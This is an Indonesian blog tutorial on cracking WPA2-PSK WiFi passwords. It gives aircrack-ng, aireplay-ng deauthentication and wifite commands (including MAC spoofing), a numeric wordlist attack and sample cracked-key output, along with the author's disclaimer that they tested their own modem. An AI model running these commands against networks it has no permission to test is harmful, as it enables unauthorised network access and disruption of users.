Translate

Jumat, 16 Juni 2017

Membobol password WIFI WPA2/PSK dengan aircrack-ng

Merupakan proses untuk menyadap informasi WIFI dan membuka password WIFI menggunakan program Aircrack-ng. Pada bahasan ini, penulis menggunakan sistem operasi tahrpup-6.0.5 dari Puppy Linux yang ringan namun lumayan lengkap gudang programnya.

Aircrack-ng dapat dipasang melalui Puppy Package Manager (PPM). Selain memasang program tersebut, ada pula yang penulis coba pakai yaitu Wifite yang juga sekalian saya pasang lewat PPM.

Setelah pemasangan, selanjutnya adalah:

Proses Menyadap

Buka Terminal pertama, lalu jalankan langkah berikut:

  • jalankan proses monitoring
  • airmon-ng start wlan0
    airodump-ng mon0
    
  • Tentukan target BSSID mana yang akan dibidik. Lihat sinyal terkuat dan sedang dipakai oleh pengguna lain, perhatikan pula channel yang dipakai. lalu tekan Ctrl-C.
  • Pada percobaan ini saya menargetkan BSSID perangkat modem yang saya miliki yaitu modem BOLT yang sedang dipakai oleh perangkat android, dengan jenis otentifikasi WPA2-PSK. (Gak etis kalo targetnya BSSID orang lain, kecuali diijinkan secara langsung sama yang punya).
  • Lanjutkan dengan perintah berikut
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
    
    keterangan:
    • 08:86:30:74:22:76 : Contoh BSSID target
    • -c 6 : channel AP dari BSSID tersebut
    • WPAcrack : nama file untuk menyimpan hasil
    • mon0 : Perangkat monitoring wireless

Kemudian buka Terminal kedua, lalu jalankan langkah berikut:

  • Ketik perintah:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
    
  • tunggu beberapa detik lalu Ctrl-C.
  • Lihat di terminal pertama:
    bila ada tulisan WPA handshake di kanan atas berarti file sadapan berisi kode password terenkripsi berhasil di dapat (biasanya ber-ekstensi .cap).

Menghentikan Proses Menyadap

untuk menghentikan proses airodump pada terminal pertama dengan: Ctrl-C.

Dilanjutkan menormalkan kembali perangkat wireless dengan:

airmon-ng stop wlan0
airmon-ng stop mon0

Proses cracking

Buka Terminal, lalu ketik:

aircrack-ng WPAcrack-01.cap -w file_code

wifite

Proses Menyadap di atas lebih enak menggunakan program wifite. Tinggal buka terminal lalu ketik:

wifite -wpadt 1 -aircrack -mac

Perintah di atas akan secara otomatis mengambil data dari BSSID yang dipilih menggunakan pola -aircrack dengan wpa-attack delay time cuma 1 detik (versi brutal, abis standarnya 10 detik - gak sabar jadinya he...he..he).
Pilihan -mac digunakan untuk menyamarkan perangkat monitoring yang kita miliki. Setelah data sadapan didapat, dilanjutkan dengan proses cracking dengan aircrack-ng sebagai berikut:

aircrack-ng K3MB4NGP4SiR_00-1E-C8-9D-5A-FD.cap -w code1.txt

code1.txt merupakan file yang berisi kode-kode angka dari 00000000 hingga 09999999, dengan satu kode angka pada tiap barisnya. File ini dapat dengan mudah dibuat dengan kode program python yang sederhana (bisa keriting jari tangan saya, kalo buatnya manual satu persatu). File kode juga dapat diperoleh dari internet terutama pada forum pengguna Kali Linux. Tapi jangan kaget dengan ukuran file kode yang cukup besar, bahkan ada yang berukuran lebih dari 1GB.

Hasilnya, untuk kode 01234567 membutuhkan waktu sekitar 12 menitan dengan kecepatan pengujian kode 1684.65 kode per detik. Kecepatan pengujian tergantung jenis mikroprosesor yang dipakai.

Contoh keluaran dari proses cracking:

                   [00:12:31] 1234500 keys tested (1684.65 k/s)


                           KEY FOUND! [ 01234567 ]


      Master Key     : E5 47 41 80 F0 CB 8D A9 20 90 FD E9 DC 82 17 05 
                       2C 51 CA 93 1C 16 DE 2F 30 34 82 29 C0 2F 5B 80 

      Transient Key  : E3 96 E7 DE 04 7C B4 8B 60 2E 9C B4 45 FF 1A C8 
                       78 C4 3E 05 0C 75 C8 26 26 E5 2A B3 8F D2 DE 37 
                       29 83 7C AC C9 91 28 CB 6B E0 EB EB 7D 83 79 49 
                       05 1F C0 4A 9D 01 BA BF 7B 25 CC 88 57 79 63 7F 

      EAPOL HMAC     : 1B CD FA 2F F3 DD C5 68 70 E1 A0 26 6E CC F2 32 

Peringatan:
Harap untuk tidak menggunakan cara yang telah dijelaskan di atas untuk membobol password modem milik orang lain. Penulis tidak bertanggung jawab atas kerugian yang mungkin dapat muncul dari penggunaan yang tidak semestinya.


Pencuri akan tercuri, Pembunuh akan terbunuh, Penghujat akan terhujat, Penipu akan tertipu.
©Eco Notes 2017

Tidak ada komentar:

Posting Komentar